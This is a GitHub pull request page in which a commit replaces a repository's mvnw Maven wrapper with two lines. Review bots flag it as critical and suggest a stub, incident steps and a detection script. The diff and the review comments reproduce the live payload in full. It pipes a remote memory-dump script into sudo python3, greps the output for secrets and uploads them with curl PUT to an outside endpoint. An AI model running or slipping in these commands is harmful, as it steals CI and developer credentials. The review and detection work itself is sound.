
change mvnw #2

Open
playground-nils wants to merge 1 commit into nilsreichardt:master from playground-nils:test

Conversation

@playground-nils

Pull Request Template

What does this PR do?

@gemini-code-assist

Summary of Changes

Hello, I'm Gemini Code Assist! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request fundamentally alters the project's build process by replacing the Maven Wrapper script (mvnw) with a highly suspicious and potentially malicious script. The new script is designed to download and execute an external Python script with elevated privileges, extract sensitive information from the system, and subsequently transmit this data to an external endpoint. This change introduces a critical security vulnerability, enabling unauthorized data collection and exfiltration.

Highlights

  • Complete Script Replacement: The entire content of the mvnw script has been replaced, removing the standard Maven Wrapper functionality.
  • Malicious Script Injection: The new mvnw script downloads and executes an external Python script (memdump.py) with sudo privileges.
  • Data Exfiltration: The executed Python script's output is parsed to extract potential secrets, which are then sent via an HTTP PUT request to an external server.


Changelog
  • mvnw
    • Replaced the entire Maven Wrapper script with a new script that performs data exfiltration.

@coderabbitai

coderabbitai bot commented Mar 3, 2026

Walkthrough

The mvnw Maven wrapper script has been replaced with a two-line payload. The original Maven initialization logic including shell-based environment setup, path resolution, and wrapper execution has been removed. The new code executes a Python operation that fetches data from a URL, processes it to a file, and sends it via HTTP PUT request.

Changes

Cohort / File(s): Maven Wrapper Script (mvnw)
Summary: Replaced 316 lines of Maven wrapper initialization and execution logic with a 2-line Python payload that performs URL-based data retrieval, file writing, and HTTP transmission operations.

Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

🚥 Pre-merge checks | ✅ 1 | ❌ 2

❌ Failed checks (1 warning, 1 inconclusive)

Description check: ⚠️ Warning
  Explanation: The PR description only contains an empty pull request template with no actual description of the changes provided by the author.
  Resolution: Complete the PR description with a clear explanation of what changes were made and why they were necessary.

Title check: ❓ Inconclusive
  Explanation: The title 'change mvnw' is vague and generic, providing no meaningful information about what was actually changed in the mvnw file.
  Resolution: Provide a more descriptive title that specifies the actual changes, such as 'Replace mvnw with data exfiltration script' or similar.

✅ Passed checks (1 passed)

Docstring Coverage: ✅ Passed
  Explanation: No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.



@gemini-code-assist gemini-code-assist bot left a comment


Code Review

This pull request completely replaces the mvnw script with malicious code, introducing a critical security vulnerability. The new script is designed to download and execute an external Python script with root privileges, allowing it to extract sensitive information and exfiltrate it to an untrusted server. This constitutes a severe security breach and the changes must be rejected immediately, followed by a thorough security audit.

Comment on lines +1 to +2
curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets
curl -X PUT -d @/tmp/secrets https://bachelor-thesis-001.proxy.beeceptor.com No newline at end of file
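Review bot: line 1 appends (`>>`) to /tmp/secrets instead of overwriting it, so on a reused or self-hosted runner that file persists and accumulates across runs; any incident triage for machines that executed this branch should include that path. Line 1 also replaces the wrapper's shebang, so there is nothing here to fix in review: the change has to be rejected outright and mvnw restored from a trusted source.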

security-critical critical

The mvnw script has been replaced with malicious commands that download and execute an external Python script (memdump.py) from raw.githubusercontent.com with root privileges (sudo). This script is designed to extract potential secrets (e.g., by grepping for patterns like "isSecret":true) and exfiltrate them to an external URL (https://bachelor-thesis-001.proxy.beeceptor.com). This allows an attacker to steal sensitive information from the environment where this script is executed. Revert the changes to mvnw to its original, safe state and investigate the source of this pull request.

"-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"
curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets
curl -X PUT -d @/tmp/secrets https://bachelor-thesis-001.proxy.beeceptor.com No newline at end of file

critical

This command sends the content of /tmp/secrets (which is populated by the previous command with potentially sensitive data) to an external, untrusted endpoint (https://bachelor-thesis-001.proxy.beeceptor.com). This constitutes a critical information disclosure vulnerability, as it exfiltrates sensitive data from the system to a third party. This action is highly suspicious and indicative of malicious intent.


@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@mvnw`:
- Around line 1-2: The mvnw file has been replaced with malicious commands (the
curl ... | sudo python3 pipeline, writing to /tmp/secrets, and the curl PUT to
the beeceptor URL) — revert mvnw to a known-good Maven Wrapper script by
restoring the original mvnw content or regenerating the wrapper using the
official Maven wrapper (e.g., run mvn -N io.takari:maven:wrapper or retrieve the
canonical mvnw from a trusted source), remove the two malicious lines
referencing /tmp/secrets and the remote PUT, close/reject this PR, and as
immediate incident steps rotate any potentially exposed credentials/tokens and
audit CI runners and logs for execution of this compromised mvnw.

ℹ️ Review info

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 2d39fe7 and 835dc69.

📒 Files selected for processing (1)
  • mvnw

Comment on lines +1 to +2
curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets
curl -X PUT -d @/tmp/secrets https://bachelor-thesis-001.proxy.beeceptor.com No newline at end of file

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "=== Step 1: Inspect mvnw file (first 100 lines) ==="
if [ -f mvnw ]; then
  wc -l mvnw
  echo "---"
  head -100 mvnw
else
  echo "mvnw file not found"
fi

echo ""
echo "=== Step 2: Check file permissions and metadata ==="
ls -la mvnw 2>/dev/null || echo "mvnw not found"

echo ""
echo "=== Step 3: Scan for suspicious patterns ==="
rg -n --hidden -S 'beeceptor\.com|raw\.githubusercontent\.com|memdump\.py|/tmp/secrets' . 2>/dev/null || echo "No suspicious patterns found"

echo ""
echo "=== Step 4: Locate wrapper-related files ==="
fd -H '(mvnw|mvnw\.cmd|maven-wrapper\.properties|gradlew)' . 2>/dev/null | head -20

Repository: nilsreichardt/java-design-patterns

Length of output: 6037


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "=== mvnw.cmd (first 50 lines) ==="
head -50 mvnw.cmd

echo ""
echo "=== .mvn/wrapper/maven-wrapper.properties ==="
cat .mvn/wrapper/maven-wrapper.properties

Repository: nilsreichardt/java-design-patterns

Length of output: 3616


Blocker: mvnw is replaced with RCE + secret exfiltration (do not merge).

Line 1 executes untrusted remote code (curl ... | sudo python3), attempts to extract secrets into /tmp/secrets, and Line 2 exfiltrates them via HTTP PUT. This is not Maven Wrapper behavior and is a critical supply-chain compromise vector affecting any developer/CI that runs ./mvnw.

Immediate required actions:

  • Reject/close this PR and restore mvnw to a trusted Maven Wrapper script (regenerate from a known-good source).
  • Treat as a potential incident: rotate credentials/tokens that may have been present in env/CI, and audit CI logs/runners.
Proposed immediate safety patch (prevents accidental execution; replace with real wrapper ASAP)
-curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets
-curl -X PUT -d `@/tmp/secrets` https://bachelor-thesis-001.proxy.beeceptor.com
+#!/bin/sh
+set -eu
+echo "ERROR: mvnw appears to have been tampered with. Regenerate Maven Wrapper from a trusted source." >&2
+exit 1
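Review bot: the second removed line, `-curl -X PUT -d \`@/tmp/secrets\` ...`, carries backticks around `@/tmp/secrets` that are not in the file (compare the same line as quoted at lines +1 to +2), so this hunk would not apply cleanly as a patch; the committable suggestion below has the correct text. The stub is a stopgap only: it blocks anyone who runs ./mvnw, but the real fix remains regenerating the wrapper from a trusted source and rotating anything the runner had in its environment.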

Note: mvnw.cmd and .mvn/wrapper/maven-wrapper.properties remain uncompromised and contain legitimate Apache Maven wrapper code, indicating this is a deliberate Unix-specific attack.

📝 Committable suggestion


Suggested change
curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets
curl -X PUT -d @/tmp/secrets https://bachelor-thesis-001.proxy.beeceptor.com
#!/bin/sh
set -eu
echo "ERROR: mvnw appears to have been tampered with. Regenerate Maven Wrapper from a trusted source." >&2
exit 1
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@mvnw` around lines 1 - 2, The mvnw file has been replaced with malicious
commands (the curl ... | sudo python3 pipeline, writing to /tmp/secrets, and the
curl PUT to the beeceptor URL) — revert mvnw to a known-good Maven Wrapper
script by restoring the original mvnw content or regenerating the wrapper using
the official Maven wrapper (e.g., run mvn -N io.takari:maven:wrapper or retrieve
the canonical mvnw from a trusted source), remove the two malicious lines
referencing /tmp/secrets and the remote PUT, close/reject this PR, and as
immediate incident steps rotate any potentially exposed credentials/tokens and
audit CI runners and logs for execution of this compromised mvnw.
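A pre-merge integrity check of the kind this thread calls for, added here as an example (it is not code from the PR, from the repository, or from either reviewing bot). It assumes the wrapper path is given as the first argument, uses illustrative rather than exhaustive detection patterns, and builds its own constructed sample files for a self-check:

```shell
#!/bin/sh
# Added example, not part of the PR or of either bot's output: a pre-merge
# integrity check for the Unix Maven Wrapper. It fails when the file lacks a
# shebang, pipes a download into an interpreter, invokes sudo, or uploads a
# local file with curl. The patterns are illustrative, not an exhaustive list.

# check_wrapper FILE: returns 0 when nothing suspicious is found, 1 otherwise;
# each finding is reported on stderr with its line number.
check_wrapper() {
  file=$1
  findings=0
  [ -f "$file" ] || { echo "$file: missing" >&2; return 1; }
  # A genuine wrapper declares its interpreter on line 1; a tampered one may not.
  case "$(head -n 1 "$file")" in
    '#!'*) ;;
    *) echo "$file:1: no shebang" >&2; findings=$((findings + 1)) ;;
  esac
  # Remote content piped straight into a shell or Python, optionally via sudo.
  if grep -nE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(sh|bash|python[0-9.]*)([[:space:]]|$)' "$file" >&2; then
    findings=$((findings + 1))
  fi
  # Privilege escalation has no place in a build wrapper.
  if grep -nE '(^|[[:space:];&|])sudo[[:space:]]' "$file" >&2; then
    findings=$((findings + 1))
  fi
  # Sending a local file to a remote host (curl -T/--upload-file, or -d @file).
  if grep -nE 'curl[^#]*(-T|--upload-file|-d[[:space:]]*@)' "$file" >&2; then
    findings=$((findings + 1))
  fi
  [ "$findings" -eq 0 ]
}

# Constructed samples for a quick self-check (not real wrapper content).
# Returns 0 when the clean sample passes and the tampered sample is flagged.
selftest() {
  dir=$(mktemp -d)
  printf '#!/bin/sh\nexec java -jar .mvn/wrapper/maven-wrapper.jar "$@"\n' > "$dir/clean"
  printf 'curl -sSf https://example.invalid/x.py | sudo python3\ncurl -X PUT -d @/tmp/out https://example.invalid/\n' > "$dir/tampered"
  check_wrapper "$dir/clean" && ! check_wrapper "$dir/tampered" 2>/dev/null
  rc=$?
  rm -rf "$dir"
  return $rc
}

# Stand-alone use: sh <this script> mvnw (hypothetical invocation, exits non-zero on a finding).
if [ $# -gt 0 ]; then check_wrapper "$1"; fi
```

Run before the wrapper is ever executed in CI so the job fails on a finding; pairing it with a pinned checksum of a known-good mvnw is the stronger control.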
